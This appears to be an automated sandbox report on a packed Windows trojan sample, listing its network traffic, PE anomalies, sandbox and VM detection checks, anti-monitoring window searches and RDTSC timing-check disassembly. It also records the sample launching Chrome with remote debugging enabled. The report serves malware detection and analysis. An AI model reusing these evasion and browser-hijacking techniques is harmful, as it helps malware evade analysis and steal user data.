Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50020 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0143E5EE 0_3_0143E5EE
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: hkkquiln ZLIB complexity 0.9942651269920318
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.evad.winEXE@24/14@18/7
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.4181034891.00001D4000761000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,6816261580910516305,6036598587685662932,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,6816261580910516305,6036598587685662932,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: file.exe Static file information: File size 4400640 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of hkkquiln is bigger than: 0x100000 < 0x1b7400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.230000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hkkquiln:EW;xxvbrqle:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hkkquiln:EW;xxvbrqle:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x43d83f should be: 0x440bef
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hkkquiln
Source: file.exe Static PE information: section name: xxvbrqle
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B7EE0 push dword ptr [eax+04h]; ret 0_2_005B7F0F
Source: file.exe Static PE information: section name: hkkquiln entropy: 7.954834567912499

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB4964 second address: AB4979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F1CB4F7964Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC07C7 second address: AC07CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC07CD second address: AC07D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC07D3 second address: AC07E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0A94 second address: AC0A9A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0BC3 second address: AC0BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0BC7 second address: AC0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F1CB4F79646h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0D6B second address: AC0D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0D70 second address: AC0D7E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CB4F79648h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0D7E second address: AC0D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0D84 second address: AC0D8E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CB4F79646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0FE5 second address: AC0FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0FEF second address: AC0FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0FF5 second address: AC1011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2B81 second address: AC2B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2B85 second address: AC2B89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2B89 second address: AC2B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2B96 second address: AC2BA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2BA1 second address: AC2BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a je 00007F1CB4F7965Ah 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F1CB4F79646h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2D39 second address: AC2D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2D3D second address: AC2D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F1CB4F7964Bh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jc 00007F1CB4F7964Ch 0x00000019 jnc 00007F1CB4F79646h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1CB4F7964Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E0A second address: AC2E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F1CB4FA4D16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E16 second address: AC2E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007F1CB4F7964Eh 0x0000000e jl 00007F1CB4F79648h 0x00000014 pushad 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F1CB4F79648h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov dl, 80h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F1CB4F79648h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f call 00007F1CB4F79649h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E7A second address: AC2E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E7E second address: AC2E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E82 second address: AC2E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f js 00007F1CB4FA4D1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E99 second address: AC2EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jng 00007F1CB4F79658h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2EAC second address: AC2EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2EB0 second address: AC2EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2F98 second address: AC2F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2F9C second address: AC2FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FA0 second address: AC2FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FE5 second address: AC2FF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FF4 second address: AC2FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FF8 second address: AC2FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD4D4C second address: AD4D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE173F second address: AE176B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F1CB4F79652h 0x00000016 jnl 00007F1CB4F7964Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE189F second address: AE18CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CB4FA4D28h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A20 second address: AE1A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A26 second address: AE1A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A31 second address: AE1A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A38 second address: AE1A4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4FA4D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A4D second address: AE1A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A51 second address: AE1A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A57 second address: AE1A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A60 second address: AE1A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D27h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F1CB4FA4D16h 0x00000014 jo 00007F1CB4FA4D16h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1BF2 second address: AE1BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1BF8 second address: AE1C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jno 00007F1CB4FA4D16h 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE269B second address: AE26A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE26A0 second address: AE26CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F1CB4FA4D29h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE284E second address: AE2866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F79652h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD7355 second address: AD7360 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
